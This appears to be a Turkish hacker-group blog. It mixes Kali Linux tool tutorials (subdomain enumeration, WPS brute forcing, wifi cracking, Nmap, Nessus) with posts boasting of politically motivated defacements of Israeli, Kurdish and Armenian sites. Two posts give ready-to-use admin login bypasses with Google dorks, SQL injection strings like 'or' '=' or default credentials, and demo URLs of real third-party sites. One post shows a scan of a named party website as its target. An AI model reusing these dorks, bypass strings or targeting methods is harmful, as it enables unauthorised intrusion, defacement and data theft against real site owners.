-->

Kali Linux Dnsmap - Subdomain Enumeration of Website in

Selamun Aleyküm ... 
 
Dnsmap

Paul Craig'in kurduğu "The Thief No One Saw" adlı kurgusal hikayeden esinlenilerek, Dnsmap ilk olarak 2006'da piyasaya sürüldü ve “Stealing the Network – How to 0wn the Box”. Başlıklı kitaptan esinlenildi.

Dnsmap
esas olarak pentester tarafından altyapı güvenliği değerlendirme/numaralandırma aşamasında bilgi toplama sırasında kullanılmak üzere tasarlanmıştır. Dnsmap Numaralandırma aşamasında, genellikle hedef şirketin IP netblocks, alt alan adlarını keşfetmek için kullanilir, hatta alt alan adlarını tespit ettigi için bu yöntem cloudflare bypass içinde kullanılır.

Genel Kullanimi : dnsmap <hedef alan adi>
Sonuç:

Dnsmap kullanim örnekleri;
Hedefi bir kelime (wordlist) listesi kullanarak taramak için ;
dnsmap example.com -w /root/Desktop/wordlisteniz.txt
yada: dnsmap example.com -w /usr/share/wordlists/dnsmap.txt

Dnsmap-bulk Kullanim Örnegi;

Birden fazla alan adlarını (domains.txt) içeren bir dosya oluşturun ve bunu dnsmap-bulk.sh 'ye gönderin
 örnek: dnsmap-bulk.sh /root/Desktop/ domains.txt



Kali Linux RED HAWK - Easy Hacking Tools


Selamun Aleyküm ...

Red Hawk Bilgi Toplama, Güvenlik Açığı Taramak İçin Kullanılan Bir Araçtır.

Red Hawk Kullanarak Yapabileceginiz Taramalar :

Temel Tarama
Site Başlığı YENİ
IP Adresi
Web Sunucusu Algılama GELİŞTİRİLMİŞ
CMS Algılama
Cloudflare Algılama
robots.txt Tarayıcı
Whoıs Arama GELİŞTİRİLMİŞ
Geo-IP Arama İp Lokasyon
Afiş Yakala  GELİŞTİRİLMİŞ
DNS Araması
Alt Alan Adı Hesap
Nmap Port Tarama
Alt Etki alanı Tarayıcı GELİŞTİRİLMİŞ
Alt Etki Alanı
IP Adresi
Ters IP Arama ve CMS Algılama GELİŞTİRİLMİŞ
Hostname
IP Adresi
CMS
SQLi Hata Tarayıcı Tabanlı
Blogcular YENİ Görünüm
HTTP Yanıt Kodu
Site Başlığı
Alexa Sıralaması
Etki Alanı Yetki
Sayfa Yetkilisi
Sosyal Bağlantı Tespiti
Grabber Linki
WordPress Tarama YENİ
Hassas Dosyaları Tarama
Sürüm Algılama
Sürüm Güvenlik Açığı Tarayıcısı
Paletli
MX Arama YENİ


Sürüm Bilgileri:
- Version 1.0.0 [11-06-2017]
- Version 1.1.0 [15-06-2017]
- Version 2.0.0 [11-08-2017]


Desteklenen CMS Listesi :
WordPress
Joomla
Drupal
Magento

Kurulum :

git clone https://github.com/Tuhinshubhra/RED_HAWK
Cd RED_HAWK
php rhawk.php
help
fix
fix komutu sıstemınızde bulunan eksık modullerı eksık olanları tespit edip indirir mutlaka kullanın fix komutunu.

VİDEO: 


Kali Linux Hash Buster - Hash Cracker

Selamun Aleyküm ...

Dowloand : https://github.com/UltimateHackers/Hash-Buster/

Blog: http://www.trazer.org/
Forum: http://www.turkz.org/Forum/



Kali Linux Bully WPS Brute Force Attack


Selamun Aleyküm ..

Bully, C'de yazılmış olan WPS kaba kuvvet saldırısının yeni bir uygulamasıdır. WPS spesifikasyonunda (şu an iyi bilinen) tasarım hatasını sömüren kavramsal olarak diğer programlarla özdeştir. Orijinal reaver kodu üzerinde birçok avantajı vardır. Bunlara daha az bağımlılık, geliştirilmiş bellek ve cpu performansı, doğru kullanımı ve daha sağlam seçenekler seti dahildir. Linux üzerinde çalışır ve mimariden bağımsız olarak gömülü Linux sistemlerinde (OpenWrt, vb.) Çalıştırmak için özel olarak geliştirilmiştir.

Bully, anormal senaryoların saptanması ve işlenmesinde çeşitli gelişmeler sağlıyor. Erişim noktalarına karşı çok sayıda satıcıdan ve farklı konfigürasyonlarla, çok başarılı sonuçlar alınarak test edilmiştir.

Wiire'in Pixiewps'inin yüklü olması gerekir. En yeni sürümü şu adreste bulabilirsiniz: https://github.com/wiire/pixiewps.

Gereksinimler :
apt-get -y install build-essential libpcap-dev libssl1.0-dev aircrack-ng pixiewps

Kurulum : git clone https://github.com/aanarchyy/bully

yada : wget https://github.com/aanarchyy/bully/archive/master.zip && unzip master.zip

cd bully*/
cd src/
make
make install


Kullanim: bully <options> interface
yada gui olarak: ./bully.py 

VİDEO: 


SQL Enjeksiyonu Nedir?


SQL enjeksiyonu, veri odaklı uygulamalara saldırmak için kullanılan bir kod enjeksiyon yöntemidir. Bu güvenlik açığıyla, bir bilgisayar korsanı uygulamanın arka uç veritabanlarıyla olan etkileşimine müdahale edebilir, girdi gönderebilir. Bilgisayar korsanı, uygulamanın rastgele verilerini alabilir, mantığına müdahale edebilir veya veritabanı sunucusu üzerindeki komutları yürütebilir.

SQL yorumlanmış bir dildir ve web uygulamaları genellikle kullanıcı tarafından sağlanan verileri içeren SQL deyimleri oluşturur. Bu, güvensiz bir şekilde yapılırsa, uygulama SQL enjeksiyonuna karşı savunmasız hale gelecektir. Bu güvenlik açığı, web uygulamalarını etkileyen en ünlü güvenlik açıklarından biridir. En ciddi durumlarda, anonim bir bilgisayar korsanının veritabanında depolanan tüm verileri okumasını ve değiştirmesini ve hatta veritabanının çalıştığı sunucunun tam kontrolünü ele geçirmesini sağlayabilir.

Çoğu modern uygulama, bu güvenlik açığından, doğru kullanıldığında, SQL enjeksiyon saldırılarına karşı kendinden emin olan API'leri kullanarak önler. Yada savunma mekanizmaları kurarak sql saldırılarının önüne geçebilir.

SQL enjeksiyonunu keşfetmek bazen zorlu bir iştir ve tipik kontrollerin uygulanmadığı bir uygulamadaki bir veya iki örneği bulmak için ısrarcı olmayı gerektirir. Bu eğilim geliştikçe, SQL enjeksiyon parçalarını bulma ve kullanma yöntemleri, açıkların daha ince göstergelerini kullanarak daha gelişmiş ve güçlü sömürü teknikleri kullanarak geliştirilir.

SQL Enjeksiyonu önleme güvenlik açığının kurbanı olmaktan kaçınmanın anahtarı, kullanıcı girdilerini denetlemek ve doğrulamaktır.

Kali Linux Vega Vulnerability Scanner

Selamun Aleyküm ...

Vega, Web Uygulamalarının Güvenliğini Test Etmek İçin Ücretsiz Ve Açık Kaynaklı Bir Tarayıcı, Test Platformudur. Vega, SQL Enjeksiyon, Siteler Arası Komut Dosyası (XSS), Yanlışlıkla Açıklanan Hassas Bilgiler Ve Diğer Güvenlik Açıklarını Bulmanıza Doğrulamanıza Yardımcı Olabilir. Java Tabanlı, GUI Temelli Olarak Yazılmıştır Ve Linux, OS X, Windows Üzerinde Çalışır.

Kaynak: https://subgraph.com/vega/
Hedef: Ermeni Devrimci Federasyonu Parti Websitesi
http://www.parliamentarf.am/

VİDEO: 



Hedef Site DATABASE PRİNTSCREEN

Kali Linux Airgeddon - Easy Wifi Hack


Selamun aleyküm ...

Airgeddon Wifi Hack İçin Tasarlanmış Bır Scriptir Kullanışlı Gayet Güzel Hoşuma Gitti Sizlerle Paylasmak İstedım. Anlatılacak Çok Şeyı Yok Numarasını Yazıyorsun Beklıyorsun. Web Wpa Wpa2 Wps Gıbı Desteklerı War Hatta Ewil Twin Bile Var..
 Video: 





Türk Hackerlardan Terör Devleti Israil'e Büyük Şok!

 Turkz Hacker Grubu terör devleti İsrail'in Mescidi Aksa'da başlatmış olduğu zulme sessiz kalmadı.

Terör devleti İsrail'in son zamanlarda Mescid-i Aksa'yı kapatmasına ve Müslümanlara uyguladığı şiddete kayıtsız kalmayan Turkz Hacker Grubu, 100 İsrail sitesini hackledi. 

Turkz Hacker Grubu terör devleti İsrail'e "Özgür Filistin" mesajı verirken sitelerinden ezan ve sela okuttu.

Turkz Hacker Grubu İsrail'e vurduğu darbeyi böyle duyurdu:



NSWEB Admin Login Bypass

#################################################################################
# Exploit Title: NSWEB Admin Login Bypass
# Author : Sipahiler / TurkZ.org
# Date : 2017-07-26
# Google Dork : intext: NSWEB © Copyright 2017. All Rights Reserved
# Tested on : Kali Linux 2017.1 And W7
# Vendor Home : http://www.nsweb.rs/
# Blog : http://www.trazer.org/
# Forum : http://www.turkz.org/Forum/  
#################################################################################


Tutorial :

[+] Dorking in google or other search enggine
[+] Open target
[+] Enter username and password with
[+] Username: 'or' '='
[+] Password: 'or' '='

Demo :
http://www.nsweb.rs/admin
http://www.nskoncept.rs/admin/

Greet'Zzz :  Darkcod3r & EfendiBey & Atabey & TrazeR & Zer0day & AKA_1NF4z & Kutluhan & Alianz & S1R

Kali Linux Nessus Kurulumu

Selamun Aleyküm ...

Nessus Nedir ?
Nessus, Linux Camiasında Sıkça Kullanılan, Kapsamlı Bir Güvenlik Açığı Tarama Yazılımıdır. Kişisel Ve Her Tür Kurumsal Olmayan Kullanım İçin Ücretsizdir. Genel Amacı, Bilgisayar Sistemlerinde Ve Bilgisayar Ağlarında Potansiyel Güvenlik Açıklarını Tespit Etmektir.

Nessus Bir Port Tarama Yazılımından Çok Daha Üstün Özelliklere Sahiptir. Nmap Benzeri Yazılımlar Yalnızca Karşıdaki Sunucu Ya Da Makine Hakkında İşletim Sistemi, Açık Port Bilgileri Verebiliyorken Nessus, Servislerdeki Açıkları Eklentilerinin Güncelliğine Bağlı Olarak Test Edebilir. Çalışma Prensibi İstemci/Sunucu Biçimini Kullanır Ve Test Edilecek Sistemde Nessus Sunucu Yazılımının Açık Olması Daha Derinlemesine Test Ve Analiz İmkânı Sunar.
 
Geliştirici(ler):Tenable Network Security
Kararlı sürüm: 4.4 / 2011/08/01
İşletim sistemi : Windows/Linux/*BSD
Tür:Güvenlik Yazılımı
Resmî sitesi:http://www.nessus.org/

Adresinden Sistem Mimariniza Uygun Olanı Bulup Kullanım Sözleşmesini Onaylayip İndiriyoruz.


İndirdikten Sonra Terminalden İndirdiğimiz Dizine Geçiyoruz
cd Dowloands 
ls 
dpkg -i Nessus-6.10.9-debian6_amd64.deb Yazarak Kurulum İşlemine Başlıyoruz.

Bulundugumuz Dizinde
/etc/init.d/nessusd start
yazarak nessus'u başlatıyoruz
Ardından https://TrazeR:8834 Adresıni Tarayıcımızda Açıyoruz
Resim Boyutlari İçin Kusura Bakmayin Yarin Düzenleyeceğim Tekrar.

https://TrazeR:8834 Adresini Tarayicimizda Açıyoruz SSL Sorunu Ve Güvensiz Diyebilir Önemli Değil Devam Ediyoruz Nessus Setup Ekrani Geliyor Buradan Contine Diyoruz.

 Nessus Güvenlik Açığı Tarayıcısıni Kullanmak İçin Bir Yönetici Hesabı Oluşturulmalıdır. Bu Kullanıcı, Kullanıcıları Oluşturma / Silme, Taramaları Durdurma Ve Tarayıcı Yapılandırmasını Değiştirme Yeteneği İle Tarayıcıyı Tam Kontrol Yetkisine Sahiptir.


Kullanici Adimizi Şifremizi Oluşturduktan Sonra Devam Ediyoruz.
Aktivaston İçin Bu ADRESTEN Kayit Oluyoruz Ve Kayit Esnasındaki Mail Adresimize Aktivasyon Kodu Geliyor.

Ve Kurulumun Bitmesi İçin Bekliyoruz.

Kurulum İşlemi Zaman Aliyor Biraz.
Ve Kurulum Tamamlandı Başlangıçda Belirlediğimiz Kullanıcı Adı Ve Şifreyle Giriş Yapıyoruz.

Karşılama Paneli Bu Şekilde Uzun Sürdüğü İçin Sıkıldım Müsait Zamanda Genel Bi Tarama Yapar Konu Altına Eklerim ..





Kalın Sağlıcakla ..

Nmap Kullanimi

Selamun Aleyküm ..
Nmap, bilgisayar ağları uzmanı Gordon Lyon (Fyodor) tarafından geliştirilmiş bir güvenlik tarayıcısıdır. Taranan ağın haritasını çıkarabilir ve ağ makinalarında çalışan servislerin durumlarını, işletim sistemlerini, portların durumlarını gözlemleyebilir.
Nmap kullanarak ağa bağlı herhangi bir bilgisayarın işletim sistemi, çalışan fiziksel aygıt tipleri, çalışma süresi, yazılımların hangi servisleri kullandığı, yazılımların sürüm numaraları, bilgisayarın güvenlik duvarına sahip olup olmadığı, ağ kartının üreticisinin adı gibi bilgiler öğrenilebilmektedir.
Nmap tamamen özgür GPL lisanslı yazılımdır ve istendiği takdirde sitesinin ilgili bölümünden kaynak kodu indirilebilmektedir. Nmap' ın kullanılabildiği işletim sistemleri LinuxWindowsMacOSSolaris, *BSD ve AmigaOS olarak sıralabilir fakat popülerliği öncelikle Linux daha sonrasında Windows' ta dır.
Kaynak : Vikipedia
Nmap herhangi bir istemci veya sunucuyu birçok farklı şekilde tarama yeteneğine sahiptir. Nmap'i güçlü kılan farklı tarama tekniklerine sahip olmasıdır. Protokol temelli (TCP, UDP, vb.) tarama yapılabileceği gibi, belirli aralıklardaki IP adresleri, alt ağlar (subnet) ve üzerlerinde çalışan port ve servisleri de taranabilir.[1]
Tarama sonuçlarında ortaya çıkabilecek port durumları aşağıdaki gibidir :
Open (Açık): Portun erişilebilir durumda olduğunu ve port üzerinde bir uygulamanın TCP bağlantılarını ya da UDP datagramlarını kabul ettiği anlamına gelmektedir.
Closed (Kapalı): Portun erişilebilir olduğunu (Paketleri almakta ve geri paket göndermekte) fakat üzerinde herhangi bir uygulamanın olmadığı anlamını taşımaktadır.
Filtered (Filtreli): Dönen tepkiler bir paket filtreleme mekanizması tarafından engellenir. Nmap portun açık olduğuna karar veremez.
Unfiltered (Filtresiz): Portlar erişilebilir ancak Nmap portların açık veya kapalı olduğuna karar veremez. (Sadece ACK scan için )
Open|filtered (Açık|Filtreli): Nmap portların açık veya filtrelenmiş olduğuna karar veremez. (UDP, IP Protocol, FIN, Null, Xmas Scan için )
Closed|filtered (Kapalı|Filtreli): Nmap portların kapalı ya da filtreli olduğuna karar veremez. (Sadece Idle Scan için )

Nmap Tarama Türleri 
TCP SYN (Half Open) Scan : 
Hedefe TCP SYN gönderilir. Portlarin Kapali Olduğu Durumlarda Hedef Makina VCevağ Olarak RST + ACK Döner.
Portlarin Açık Olduğu Durumlarda İse Hedef Makina SYN + ACK Bayrakli Segment Döndürür. Daha Sonra Kaynak Makina RST Bayrakli Segment Göndererek Bağlantiyi Koparir Ve Böylelijle TCP Üçlü El Sıkışma (TCP Three-Way Handshaking) Tamamlanmaz. Bu Tarama Türünce TCP Üçlü El Sıkışma Gerçekleşmediği İçin Bu Tarama Türü Hedef Sistemlerinde Herhangi Bir Şekilde İz Birakmaz.
Kullanım Şekli : nmap -sS -v hedef_ip_adresi

TCP Connect Scan : 
Kaynak Makinanin Gerçekleştireceği TCP Connet Scan, Kapali Portlara Yapildiği Zaman RST + ACK Bayrakli Segment Dönecektir. Ancak Açık Portlara Yapildiği Durumlarda Hedef Makinanin Göndereceği SYN + ACK Bayrakli Segmenti, Kaynak Makina ACK Bayrakli Segment Göndererek Cevaplar Ve Üçlü El Sıkışmayi Tamamlar.
Kullanım Örneği: nmap -sT -v hedef_ip_adresi

FIN (Stealth) Scan  :
Hedef Makinaya TCP Bağlanti İstegi Olmadan Gönderilen Segmentle Tarama Yapilir. Kaynak Makinanin Göndereceği FIN Bayrakli Segment, Hedef Makinanin Kapali Bir Portuna Gelirse Hedef Makina RST + ACK Bayrakli Segment Döndürecektir. Eğer Açık Portuna Gelirse Hedef Makinadan Herhangi Bir Tepki Dönmeyecektir.
Kullanım Şekli : nmap -sF -v hedef_ip_adresi

Xmas Scan :
Bu Tarama Türünde Kaynak Bilgisayarin TCP Segmentine, URG,PSH Ve FIN Bayraklarini Set Edeceği ("1" Yapilacaği) Segment Hedef Makinaya Gönderilir. Eğer Kaynak Makinanin Gödereceği URG,PSH Ve FIN Bayrakli Segment, Hedef Makinanin Kapalı Portuna Gelirse Hedef Makina RST + ACK Bayrakli Segment Döndürecektir. Eğer Port Açık Olursa Hedef Makinadan Herhangi Bir Tepki Dönmeycektir.
Bu Tarama Türünde TCP Başlığı İçerisinde Yer Alan Toplam Altı Adaet Bayraktan Üç Tanesi Set Edildiği ("1" yapildiği) İçin, Gönderilen Segment Yılbaşı Ağacının Yanan Lambalarina Benzetilmiştir. Bundan Dolayida  Bu Tarama Türüne Xmas (Christmas) Scan Denmiştir. 
Kullanım Şekli: nmap -sX -v hedef_ip_adresi

Null Scan : 
Hiç Bir Bayrağın Bulunmayacağı Bu Tarama Türü, Gerçek Hayatta Karşımıza Çıkmayan Bir Durumdur. Kaynak Makinan,in Gödereceği Bayraksız Segmentler Karşısında Hedef Makinanin Vereceği Tepkiler FIN Scan İle Aynıdır. Kaynak Makinanın Göndereceği Bayraksız Segment, Hedef Makinanin Kapalı Bir Portuna Gelirse Hedef Makina RST + ACK Bayrakli Segment Döndürecektir. Eğer Port Açık Olursa Hedef Makinadan Herhangi Bir Tepki Dönmeycektir.
Kullanım Şekli : nmap -sN -v hedef_ip_adresi

Ping Scan : 
Bu Tarama Türünda Kaynak Makina Hedef Makinaya Tek Bir ICMP Echo İstek Paketi Gönderir. İP Adresi Erişebilir Ve ICMP Filtreleme Bulunmadığı Sürece, Hedef Makinaya ICMP Echo Cevabi Döndürecektir. Eğerü Hedef Makina Erişilebilir Değilse Veya Paket Filtreleyici ICMP Paketlerini Filtreliyorsa, Hedef Makinadan Herhangi Bir Cevap Dönmeyecektir. 
Kullanım Şekli : nmap -sP -v hedef_ip_adresi

UDP Scan : 
Kaynak Makinanın Hedef Makinaya UDP Datagramina, ICMP Port Unreachable Cevabi Döndürülüyorsa Hedef Makina Kapali Kabul Edilecektir. Herhangi Bir Tepki Döndürmeyen Hedef Makina Open|Filtered Kabul Edilecektir. UDP Datagramiyla Cevap Döndüren Hedef Makinaya Ait Port İse Açık Kabul Edikecektir.
Kullanım  Şekli : nmap -sU -v hedef_ip_adresi

IP Protocol Scan : 
Bu Tarama Türü Standart Nnamp Tarama Türlerinden Biraz Farklidir. Bu Tarama Türünde Hedef Makinalarin Üzerlerinde Çalışan IP Tabanli Protokoller Tespit Edilmektedir. Bu Yüzden Bu Tarama Türüne Tam Anlamiyla Bir Port Taramasi Demek Mümkün Değildir. Hedef Makina Üzerinde Taramasını Yaptığımız İP Protokolü Aktif Haldeyse Makinadan Bu Taramaya Herhangi Bir Cevap Gelmeyecektir. Hedef Makina Üzerinde, Taramasini Yaptıgımız IP Protokolü Aktif Halde Değilse Hedef Makinadan Bu Taramaya, Tarama Yapılan Protokolün Türüne Göre Değişebilen RST Bayrakli (RST Bayraği "1" Yapılmış) Bir Segment Cevap Olarak Gelecektir.
Kullanım Şekli : nmap -sO -v hedef_ip_adresi

ACK Scan : 
Bu Tarama Türünde Kaynak Makina Hedef Makinaya TCP ACK Bayrakli Segment Gönderir. Eğer Hedef Makina ICMP Destination Unreachable Mesajını Dönerse Ya Da Hedef Makinada Bu Taramaya Karşılık Herhangi Bir Tepki Oluşmazsa Port "filtered" Olarak Kabul Edilir. Eğer Hedef Makina RST Bayrakli Segment Döndürürse Port "unfiltered" Kabul Edilir.
Kullanım Şekli : nmap -sA -v hedef_ip_adresi

Window Scan : 
Window Scan, ACK Scan TürüneBenzer Ancak Bir Önemlii Farki Vardir. Window Scan Portlarin Açık Olma Durumlarini Yani "OPEN" Durumlarini Gösterebilir. Bu Taramanin İsmi TCP Windowing İşleminden Gelmektedir. Bazı TCP Yığınlari, RST Baraktli Segmentlere Cevap Döndüreceği Zaman, Kendilerine Özel Window Boyutlari Sağlarlar. Hedef Makinaya Ait Kapali Bir Porttan Dönen RST Segmentine Ait Window Boyutu Sifirdir. Hedef Makinaya Ait Açık Bir Porttan Dönen RST Segmentine Ait Window Boyutu Sıfırdan Farkli Olur.
Kullanım Şekli : nmap -sW -v hedef_ip_adresi

Idle Scan : 
Bu Tarama Türü Kaynak Makinanin Hedef Makinaya Tarama Esnasinda Aktif Olarak Rol Almadığı Bir Türdür. Kaynak Makina "ZOMBİ" Olarak Nitelendirilen Makinalar Üzerinden Hedef Makinayi Tarayarak Bilgi Toplar.
Kullanım Şekli : nmap -sl -v zombi_ip hedef_ip_adresi

Nmap Betik Motoru (Nmap Scripting Engine -NSE)
NSE (Nmap Script Engine) Nmapin En Güçlü Ve Kullanışlı Özelliklerinden Birisidir. NSE'yi Normal Nmap Komutlariyla Yapılamayan Yada Yapılması Çok Zor Olan İşlemlerin Daha Kolay Bir Şekilde Yapılmasının Sağlandığı Bir Betikler Bütünü Olarak Tarif Edebiliriz. Nmap İle Birlikte Bir Çok Betik Kütüphanesi Hazır Olarak Gelmektedir. NSE Kullanılarak Temel Olarak Yapılabilecekler Aşağıda Listelenmiştir.
1) Ağ Keşifleri: Hedef Etki Alanlarının Whois Veri Tabani Sorgulari Yapilabilir. Hedef Sistemlerin SNMP Sorgulari Yapılabilir Ve Mevcut NFS/SMB/RPC Paylaşım Ve Servisleri Listenilebilir.

2) Karmaşık Versiyon Tespiti: Normal Nmap Komutlariyla Hedef Sistemlerin Versiyonlari Belirlenebilmektedir. NSE İle Hedef Sistemlerin Versiyonlari Çok Daha Ayrıntili Bir Şekilde Tespit Edilebilir.
3)  Zafiyet (Vulnerability) Tespiti: Normal Nmap Komurtlariyla Hedef Sistemlerin Zafiyetleri Tam Anlamıyla Tespit Edilememektedir. NSE İle Bu Zafiyetler Daha Kolayca Belirlenebilir. Nmap İle Hazır Gelen Biir Çok Zafiyet Tespit Betiği Bulunmaktadir. Ancak Temel İşlevinin Zafiyet Tarayicisi Olmadığının Bilinmesi Gerekir.
4) Arka Kapi (Backdoor) Tespiti: NSE  Bazi Arka Kapi Programlarinida Tespit Edebilmektedir.
5)  Zafiyet Sömürmesi (Vulnerability Exploitation) NSE İle Sadece Hedef Sistemlerin Zafiyetkeri Tespit Edilmekle Kalmayip Bu Zafiyetlerin Bazıları Kullanilarak Hedef Sistemlere Sızılmasi Mümkün Olmaktadir. Fakat Nmap'in Temel Amaci Metasploit Gibi Bir Zafiyet Sömürü Programina Dönüşmek Değildir. Buna Ragmen NSE İle Hedef Sistemlerdeki Bazi Zafiyetlerin Sömürülmeside Mümkündür.NSE 'nin Geliştirilmesine Devam Edilmektedir.

Nmap Tarama Örneklei : 
nmap -sS -sV -Pn -top-ports 10 192.168.38.130
sS : Syn Taramasi 
sV : Versiyon Bilgisi
Pn : Ping Atma 
Top-ports10: En Çok Kullanilan 10 Portu Tara.
nmap -sS -sV -Pn -T4 -p- 192.168.38.130
sS : Syn Taramasi 
sV : Versiyon Bilgisi
Pn : Ping Atma 
T4 : Tarama Hizi Hizli Bir Tarama.
-p- : Tüm Portlari Tara
Bu Tarama Çok Uzun Sürdüğü İçin Hazır Taranmış Bir Ekran Görüntüsü Koyuyorum.

nmap -sS -A -Pn -oA sonuclar 51.255.10.187
sS : Syn Taramasi 
A  : Versiyon Ve İşletim Sistemi Bilgisi
Pn : Ping Atma 
oA : 3 Farkli Formatta Tarama Çıktısını Kaydeder.

nmap --script ftp-anon -p 21 51.255.10.187
script : Nmap Scriptlerini Kullanmamizi Sağlar.
ftp-anon : Ftp 'ye Anonim Girişi Olup Olmadıgını Kontrol Eder.
p 21 : Port 21 de Scripti Çalıştırır
Zafiyet Oldugunda 2.ci Komut Satirindaki Gibi Belirtir.

nmap --script http-dombased-xss www.trazer.org
script : Nmap Scriptlerini Kullanmamizi Sağlar.
http-dombased-xss : trazer.org'da xss ara
Couldn't find any DOM based XSS.=
Yani Herhangi Bir Dom Tabanli XSS Bulunamadı :) 

Ek Olarak Nmap İle cloudflare Bypass Yapabilirsiniz. Aslında Bypass Demiyelimde Otomatik Olarak Nmap Aracı İle Hedef Sistemin Dns Üzerindeki Tüm Alan Adlarina Subdomain Vs Brute Force Yapilarak Alt Alan Adlari Tespit Edilip Gerçek İp Adresi Bulunabilir. 
nmap --script dns-brute -sn hedefsite.com

Benim Size Aktarma İstediklerim Bu Kadardı Sizler İçin Sağ Soldan Toparladım Ve Bu Çıktı Ortaya
Umarım Anlaşılır Olmuştur. Nmap Scriptlerini /usr/share/nmap/script/ Klasörü Altında Bulup İnceleyebilirsiniz. Bu Yazımızda Nmap Aracının Çok Kaliteli Bir Keşif Aracı Olduğunu Uygulayip Öğrenmiş Olduk.
Nmap Kullanımı Hakkinda Daha Detayli Bilgi İçin Buradaki Linke Göz Atabilirsiniz.

TrazeR Sunar //

hpg-online.org hacked

Selamun Aleykum..

Uzun bir zamandır PKK ve Terör yanlısı tüm aktiviteleri yakından takip ettiğimizi söylemiştik.
Bu doğrultuda daha önce de hacklediğimiz,PKK'nın askeri kanadı olan HPG yi an itibari ile yine yeniden hacklemiş bulunuyoruz.

Apo itlerine,PKK'nın HPG kanadına "komando" marşı dinlettik! İndex'i 4 saat sonunda kaldırabildiler :)

Operasyonlarımız aralıksız devam ediyor,PKK'ya ait önemli diğer sitelerde Turkz Grup Sipahiler damgası yiyecektir. Tek tek inlerine gireceğiz beklemede kalın..





TurkZ Grup
#Sipahiler
#TrazeR

Zamikinfotech Admin Login Bypass

#################################################################################
# Exploit Title: Designed By zamikinfotech.in™ Admin Login Bypass
# Author : Sipahiler / TURKZ.org
# Google Dork : Designed By zamikinfotech.in™
# Tested on : Kali Linux
# Data : 2017-06-01
# Blog : http://www.trazer.org/
# Forum : http://www.turkz.org/Forum/     
#################################################################################


Tutorial :

[+] Dorking in google or other search enggine
[+] Open target
[+] Enter username and password with
[+] Username: admin
[+] Password: 12345

OR

[+] Username: '=' 'or'
[+] Password: '=' 'or'

Demo :
http://dupattaworld.in/admin/
http://www.mutejeans.com/admin/login.php
https://cxsecurity.com/issue/WLB-2017060046
http://www.turkz.org/Forum/konu/designed-by-zamikinfotech-in™-admin-login-bypass.2837